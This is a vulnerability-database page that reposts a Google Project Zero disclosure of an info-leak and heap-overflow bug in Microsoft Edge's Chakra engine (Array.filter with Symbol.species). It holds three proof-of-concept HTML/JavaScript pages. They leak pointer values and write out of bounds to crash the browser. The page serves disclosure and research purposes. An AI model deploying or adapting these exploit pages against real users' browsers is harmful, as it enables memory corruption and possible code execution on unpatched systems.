Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Edge - Array.filter Info Leak Vulnerability

🗓️ 19 Nov 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt🔗 0day.today👁 56 Views

Microsoft Edge Array.filter Info Leak Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows 10 Edge - chakra.dll Info Leak / Type Confusion Remote Code Execution Exploit
6 Jan 201700:00
zdt
GithubExploit		Exploit for Out-of-bounds Write in Microsoft
29 Apr 202620:45
githubexploit
ATTACKERKB		CVE-2016-7200
10 Nov 201600:00
attackerkb
ATTACKERKB		CVE-2016-7202
10 Nov 201600:00
attackerkb
ATTACKERKB		CVE-2016-7243
10 Nov 201600:00
attackerkb
ATTACKERKB		CVE-2016-7208
10 Nov 201600:00
attackerkb
ATTACKERKB		CVE-2016-7201
10 Nov 201600:00
attackerkb
BDU FSTEC		Microsoft Edge browser vulnerability, which allows a hacker to trigger a service failure or execute arbitrary code
27 Dec 201600:00
bdu_fstec
Circl		CVE-2016-7200
18 Nov 201600:00
circl
CISA KEV Catalog		Microsoft Edge Memory Corruption Vulnerability
28 Mar 202200:00
cisa_kev
Rows per page
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=922
 
There is an info leak in Array.filter. In Chakra, the destination array that arrays are filtered into is initialized using ArraySpeciesCreate, which can create both native and variable arrays. However, the loop that calls the filter function assumes that the destination array is a variable array, and sets each value using DirectSetItemAt, which is unsafe, and can lead to a var pointer being written to an integer array. A PoC is as follows and attached:
 
 
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
 
    constructor(){
 
        return d;
        }
}
 
class MyArray extends Array {
 
  static get [Symbol.species]() { 
  return dummy; 
}
}
 
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
 
function test(i){
 
    return true;    
}
 
 
a.__proto__ = MyArray.prototype;
 
var o = a.filter(test);
var h = [];
 
for(item in o){
 
    var n = new Number(o[item]);
    if (n < 0){
        n = n + 0x100000000;
    }
    h.push(n.toString(16));
 
}
 
alert(h);
 
<html><body><script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
 
    constructor(){
        alert("in constructor");
        return d;
        }
 
}
 
class MyArray extends Array {
  // Overwrite species to the parent Array constructor
  static get [Symbol.species]() { 
 
    alert("get");
        b[0] = {};
  return dummy; }
}
 
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
 
 
function test(i){
 
    return true;    
 
}
 
 
 
a.__proto__ = MyArray.prototype;
 
var o = a.filter(test);
alert(o);
var h = [];
 
for(item in o){
 
    var n = new Number(o[item]);
    if (n < 0){
        n = n + 0x100000000;
    }
    h.push(n.toString(16));
 
}
 
alert(h);
 
</script></body></html>
 
https://bugs.chromium.org/p/project-zero/issues/detail?id=922#c1
 
I looked a bit more into this issue, and I think it can actually be used to corrupt the heap too. The issue is that DirectSetItemAt is called on an int array when it thinks it's a Var array. But since elements of a Var array are twice as wide as elements of the int array, setting items at indexes larger than half the array length will write outside of the allocated array. I've attached a sample that crashes Edge and demonstrates the overflow.
-->
 
<html>
<body>
<script>
 
var b = new Array(1,2,3);
var d = new Array(1,2,3);
d.length = 0x200000;
d.fill(7);
class dummy{
 
    constructor(){
        alert("in constructor");
        return d;
        }
 
}
 
class MyArray extends Array {
  // Overwrite species to the parent Array constructor
  static get [Symbol.species]() { 
 
    alert("get");
        b[0] = {};
  return dummy; }
}
 
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
 
for(var i = 0; i < 0x200000; i++){
    a[i] = i;
 
}
 
function test(i){
 
    return true;    
 
}
 
 
 
a.__proto__ = MyArray.prototype;
 
var o = a.filter(test);
alert(o);
var h = [];
 
for(item in o){
 
    var n = new Number(o[item]);
    if (n < 0){
        n = n + 0x100000000;
    }
    h.push(n.toString(16));
 
}
 
alert(h);
 
</script>
</body>
</html>

#  0day.today [2018-02-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Nov 2016 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.88
microsoft edgearray.filterinfo leakvulnerabilitychakraarrayspeciescreatedirectsetitematproject zeroheap corruptionexploit
56